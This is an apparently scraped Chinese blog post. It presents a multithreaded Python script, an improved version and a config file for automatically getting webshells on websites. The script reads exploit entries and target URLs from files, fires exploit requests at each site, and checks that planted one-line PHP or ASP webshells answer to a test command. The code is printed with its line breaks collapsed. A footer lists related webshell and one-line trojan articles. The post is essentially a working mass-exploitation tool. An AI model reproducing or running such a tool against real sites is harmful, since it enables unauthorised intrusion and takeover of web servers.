一键获取webShell,同时验证是不是可以连接一句话
来源:互联网 发布:网络正常网页无法访问 编辑:程序博客网 时间:2024/06/05 02:38
目标:根据上一篇写的指纹录入工具,可以收集很多cms等漏洞指纹,然后运行改脚本直接获取shell,也可以作为路径扫描程序,同时含有一句话连接验证功能
#coding=utf-8import requestsimport Queueimport threadingimport requeue=Queue.Queue()#===================================================##exp_info#exp_info(0) 提交的方式#exp_info(1) 测试路径#exp_info(3) POST 提交的数据 GET 为空#exp_info(4) 关键字#exp_info(5) shell的路径#exp_info(5) shell的密码#====================================================#def init(): f=open("exp.dic") for line in f.readlines(): exp_info=line.strip().split('|') queue.put(exp_info) f.close()def openUrl(url,GET_POST,pdata): try: if GET_POST=="POST": #分解post数据 s = ",".join(pdata.split("&")) pdata = dict((l.split('=') for l in s.split(','))) r = requests.post(url, timeout=20, allow_redirects=False, data=pdata) else : r = requests.get(url, timeout=20, allow_redirects=False) content=r.content r.close() if r.status_code in [200,500]: return (r.status_code ,r.encoding,content) return (0,0,False) except: return (0,0,False)def checkKeyWord(page,page_encoding,keyword): try: page = unicode(page, page_encoding) except: return False pattern =re.compile(keyword) if pattern.findall(page)!=[]: return True else: return Falsedef checkConnectionSuccess(shell_url,pdata): status_code, encoding, content = openUrl(shell_url, "POST", pdata) #print status_code,content if content == "test": print " the connection is successful " else: print "the connection is fail"def checkGetShellSuccess(shell_url,shell_pwd): script_type=shell_url.split(".")[-1] #print script_type if script_type=='php': pdata=shell_pwd+'=echo "test";' return checkConnectionSuccess(shell_url,pdata) elif script_type=='asp': pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")' return checkConnectionSuccess(shell_url,pdata) else: pdata=shell_pwd+'=Response.Clear();Response.Write("test");' return checkConnectionSuccess(shell_url,pdata)def output(content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd): if content is not False: if content is None: print '[-]status[%s]---%s |no foud data' % (status_code, test_url) else: if re_keyword is None: if shell_url is None: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url) else: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd) else: if checkKeyWord(content, page_encoding, re_keyword) is True: if shell_url is None: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url) else: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd) #检测是不是可以连接一句话 checkGetShellSuccess(shell_url, shell_pwd) else: print '[-]status[%s]---%s is possible' % (status_code, test_url)def scan(url): while not queue.empty(): exp_info=queue.get(True) GET_POST=exp_info[0] test_url=url+exp_info[1] pdata=exp_info[2] re_keyword=exp_info[3] shell_url=url+exp_info[4] shell_pwd=exp_info[5] #print "scanning "+url status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata) output(content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd) queue.task_done()if __name__=="__main__": threadNum = 50 #线程数量 f=open("2.txt") #2.txt添加你要测试的网站 for url in f.readlines(): init() url="http://"+url.strip() print "scanning "+url for i in range(threadNum): t = threading.Thread(target=scan,args={url,}) t.start() queue.join() f.close() raw_input('press enter key to exit') #这儿放一个等待输入是为了不让程序退出
利用pyinstaller 打包成exe,运行结果如下:
最新加入了一句话验证功能
优化版本
a)添加配置文件
b)文件不存在捕获提示
c)输出提示更完善
getshell.py
#coding=utf-8import requestsimport Queueimport threadingimport reimport ConfigParserqueue=Queue.Queue()#===================================================##exp_info#exp_info(0) 提交的方式#exp_info(1) 测试路径#exp_info(3) POST 提交的数据 GET 为空#exp_info(4) 关键字#exp_info(5) shell的路径#exp_info(5) shell的密码#====================================================#def init(filename): try: f=open(filename) for line in f.readlines(): exp_info = line.strip().split('|') queue.put(exp_info) f.close() except: return Falsedef openUrl(url,GET_POST,pdata): try: if GET_POST=="POST": #分解post数据 s = ",".join(pdata.split("&")) pdata = dict((l.split('=') for l in s.split(','))) r = requests.post(url, timeout=20, allow_redirects=False, data=pdata) else : r = requests.get(url, timeout=20, allow_redirects=False) content=r.content r.close() if r.status_code in [200,500]: return (r.status_code ,r.encoding,content) return (0,0,False) except: return (0,0,False)def checkKeyWord(page,page_encoding,keyword): try: page = unicode(page, page_encoding) except: return False pattern =re.compile(keyword) if pattern.findall(page)!=[]: return True else: return Falsedef checkConnectionSuccess(shell_url,pdata): status_code, encoding, content = openUrl(shell_url, "POST", pdata) #print status_code,content if content == "test": print " the connection is successful " else: print "the connection is fail"def checkGetShellSuccess(shell_url,shell_pwd): script_type=shell_url.split(".")[-1] #print script_type if script_type=='php': pdata=shell_pwd+'=echo "test";' checkConnectionSuccess(shell_url,pdata) else: pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")' checkConnectionSuccess(shell_url,pdata)def output(url,content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd): if content is not False: if content is None: print '[-]status[%s]---%s |no foud data' % (status_code, test_url) else: if re_keyword is None: if shell_url ==url: print '[+]status[%s]---shell url: %s ' % (status_code, test_url) else: print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd) else: if checkKeyWord(content, page_encoding, re_keyword) is True: if shell_url ==url: print '[+]status[%s]---shell url: %s ' % (status_code, test_url) else: print test_url print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd) #检测是不是可以连接一句话 checkGetShellSuccess(shell_url, shell_pwd) else: print '[-]status[%s]---%s is possible' % (status_code, test_url)def scan(url): while not queue.empty(): exp_info=queue.get(True) GET_POST=exp_info[0] test_url=url+exp_info[1] pdata=exp_info[2] re_keyword=exp_info[3] shell_url=url+exp_info[4] shell_pwd=exp_info[5] #print "scanning "+url status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata) output(url,content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd) queue.task_done()def configRead(): config = ConfigParser.ConfigParser() config.readfp(open('config.ini')) test_url_file_path = config.get("file_path", "test_url_file_path") exp_file_path = config.get("file_path", "exp_file_path") return test_url_file_path,exp_file_pathif __name__=="__main__": test_url_file_path, exp_file_path = configRead() threadNum = 50 try: f=open(test_url_file_path) for url in f.readlines(): if(init(exp_file_path) is False): print "exp file not found" break url="http://"+url.strip() print "scanning "+url for i in range(threadNum): t = threading.Thread(target=scan,args={url,}) t.start() queue.join() f.close() except: print "test web url file not found" raw_input('press enter key to exit') #这儿放一个等待输入是为了不让程序退出
配置文件
config.ini
[file_path];网站测试文件路径test_url_file_path=2.txt;exp文件路径exp_file_path=exp.dic
0 0
- 一键获取webShell,同时验证是不是可以连接一句话
- webshell一句话木马
- PHP一句话Webshell变形总结
- WEBSHELL姿势之SQL一句话
- 浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL
- 纯符号一句话webshell PHP代码详解
- 类似msn可以弹出提示框,同时可以点击连接
- iOS-OC一句话设施UIButton倒计时(获取验证码)
- PHPwind后台获取Webshell
- 代码调用DruidDataSource来管理conn连接,同时声明了ThreadLocal对象来保存每次线程请求所获取的连接,这样可以避免每个new一个JDBC
- 验证正则表达式(一),同时验证手机号码和固定电话号码
- 使用wifi direct,同时可以连接ap么
- VPN账号可以两个人同时连接吗
- datatable隐藏列同时可以获取列数据
- Fresco前传(1):一句话搞定图片显示(同时还可以满足各种小需求哦)
- 利用log备份获取WEBSHELL
- 利用Log备份获取Webshell
- 利用public权限获取webshell
- 设备信息的XDPI,YDPI显示问题
- 新浪微博登录
- lsusb基本使用
- java面试题及答案
- c/c++ 头文件包含策略
- 一键获取webShell,同时验证是不是可以连接一句话
- 教你如何读懂卷积神经网络(CNN)
- 五种Java 多线程同步的方法
- 操纵DOM之---attr 获取与设置属性的值
- 简单题
- linux 下lzma压缩可以达到63倍的压缩率
- JavaSE-smecking的学习笔记一()
- json去重
- pthread多线程基础知识学习